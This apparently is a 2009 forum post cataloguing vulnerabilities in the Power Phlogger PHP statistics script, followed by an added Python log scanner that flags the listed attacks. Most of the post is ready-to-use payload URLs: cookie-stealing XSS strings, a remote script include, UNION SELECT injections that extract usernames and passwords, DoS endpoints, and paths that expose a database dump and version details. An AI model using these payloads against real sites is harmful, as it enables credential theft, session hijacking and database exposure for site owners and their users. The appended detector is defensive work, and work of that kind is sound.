baltazar
04.01.2009, 23:12
Power Phlogger <= 2.0.9 (config.inc.php3) File Include Vulnerability (http://www.milw0rm.com/exploits/2602)
Power Phlogger Rel_Path Remote File Include Vulnerability (http://www.securityfocus.com/bid/20638)
Power Phlogger Login.PHP SQL Injection Vulnerability (http://www.securityfocus.com/bid/24622)
Power Phlogger 'css_str' SQL Injection Vulnerability (http://www.securityfocus.com/bid/29566)
Power Phlogger 2.0.9 Remote|Local File Include Vulnerability (http://www.security.nnov.ru/Odocument804.html)
Power Phlogger v.2.2.5 (username) SQL Injection (http://securityvulns.ru/Rdocument349.html)
XSS:
http://site/dspLogs.php?S_hostname=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_referer=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_res=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/edCss.php?css_str=12%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&action=edit
http://site/dspLogs.php?S_color=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_online=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php?S_mp=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspStats.php?edit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/dspLogs.php/%22%3E%3Cscript%20src=XSS
http://site/dspStats.php/%22%3E%3Cscript%20src=XSS
http://site/edCss.php/%22%3E%3Cscript%20src=XSS
http://site/edCss.php?action=create+new&fields%5Bcss%5D=%3Cscript%3Ealert(document.cookie)%3C/script%3E
XSS (Persistent):
POST request to the page http://site/edUserprofile.php
</textarea><script>alert(document.cookie)</script>
In the N_your_url parameter
"><script>alert(document.cookie)</script>
In the N_email parameter
"><script src=http://site.com
In the N_fg_c and N_bg_c parameters (up to 30 characters)
DoS:
http://site/include/get_userdata.php
http://site/newaccount_self.php
Looping redirects.
(c)MustLive
SQL injections:
http://site/edCss.php?css_str=-1%20union%20select%20null,null,id,username,pw,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20pphl_users%20limit%200,1&action=edit
http://site/edit.php?site=-12%20union%20select%200,1,username,password,4,version(),user(),7,8,9,10,11,database(),13,14,15,16,17,18++from+users--
Full path disclosure:
http://site/include/edCss.inc.php
http://site/include/foot.inc.php
http://site/include/get_csscolors.inc.php
http://site/include/head.inc.php
http://site/include/head_stuff.inc.php
http://site/include/loglist.inc.php
http://site/include/pphlogger_send.inc.php
http://site/modules/usercreate.php
http://site/modules/htmlMimeMail.php
http://site/modules/img_vis_per_hour.mod.php
http://site/edit_user.php
http://site/main-dummy.php
http://site/main.php
Information disclosure:
http://site/modules/db_dump.php
Database names, table structure
http://site/robots.txt
http://site/upgrade/extchange.php
http://site/main_location.inc
<meta name="PHP Version" content="..." />
<meta name="MYSQL Version" content="..." />
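A defensive check built from the list above, as an added example that is not part of the original post: it scans web-server access log lines for requests that match the listed endpoints and parameters. The log lines are constructed samples; the function names, the combined log format and the `/stats/` install prefix are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Endpoints and parameter names come from the post; everything else is assumed.
XSS_PAGES = ("/dspLogs.php", "/dspStats.php", "/edCss.php")
SQLI_PARAMS = {"/edCss.php": "css_str", "/edit.php": "site"}
DIRECT = re.compile(r"/(?:include|modules)/[^/]+\.php$")
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SCRIPT = re.compile(r"<\s*script", re.I)
UNION = re.compile(r"\bunion\b.+\bselect\b", re.I | re.S)

def classify(target):
    """Return the set of finding labels for one request target."""
    parts = urlsplit(target)
    path = unquote(parts.path)
    params = parse_qsl(parts.query, keep_blank_values=True)  # percent-decodes values
    found = set()
    for page in XSS_PAGES:
        at = path.find(page)
        if at == -1:
            continue
        path_info = path[at + len(page):]  # text after the script name in the path
        if SCRIPT.search(path_info) or any(SCRIPT.search(v) for _, v in params):
            found.add("xss")
    for script, name in SQLI_PARAMS.items():
        if path.endswith(script) and any(k == name and UNION.search(v) for k, v in params):
            found.add("sqli")
    if DIRECT.search(path):  # include/module files requested directly over HTTP
        found.add("direct-include-access")
    return found

def scan(log_lines):
    """Return (line number, sorted labels) for every flagged log line."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        labels = classify(match.group(1)) if match else set()
        if labels:
            hits.append((number, sorted(labels)))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '198.51.100.7 - - [04/Jan/2009:23:12:01 +0000] "GET /dspLogs.php?S_hostname=example.org HTTP/1.1" 200 5120',
    '198.51.100.9 - - [04/Jan/2009:23:12:05 +0000] "GET /dspLogs.php?S_agent=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5301',
    '198.51.100.9 - - [04/Jan/2009:23:12:09 +0000] "GET /edCss.php?css_str=-1%20union%20select%20null&action=edit HTTP/1.1" 200 2210',
    '198.51.100.9 - - [04/Jan/2009:23:12:12 +0000] "GET /include/head.inc.php HTTP/1.1" 200 310',
    '198.51.100.9 - - [04/Jan/2009:23:12:15 +0000] "GET /stats/edCss.php/%22%3E%3Cscript%20src=x HTTP/1.1" 200 2190',
]
```

The stored XSS submitted in the POST body of edUserprofile.php does not show up in access logs; catching it needs request-body logging or a check on the stored profile values.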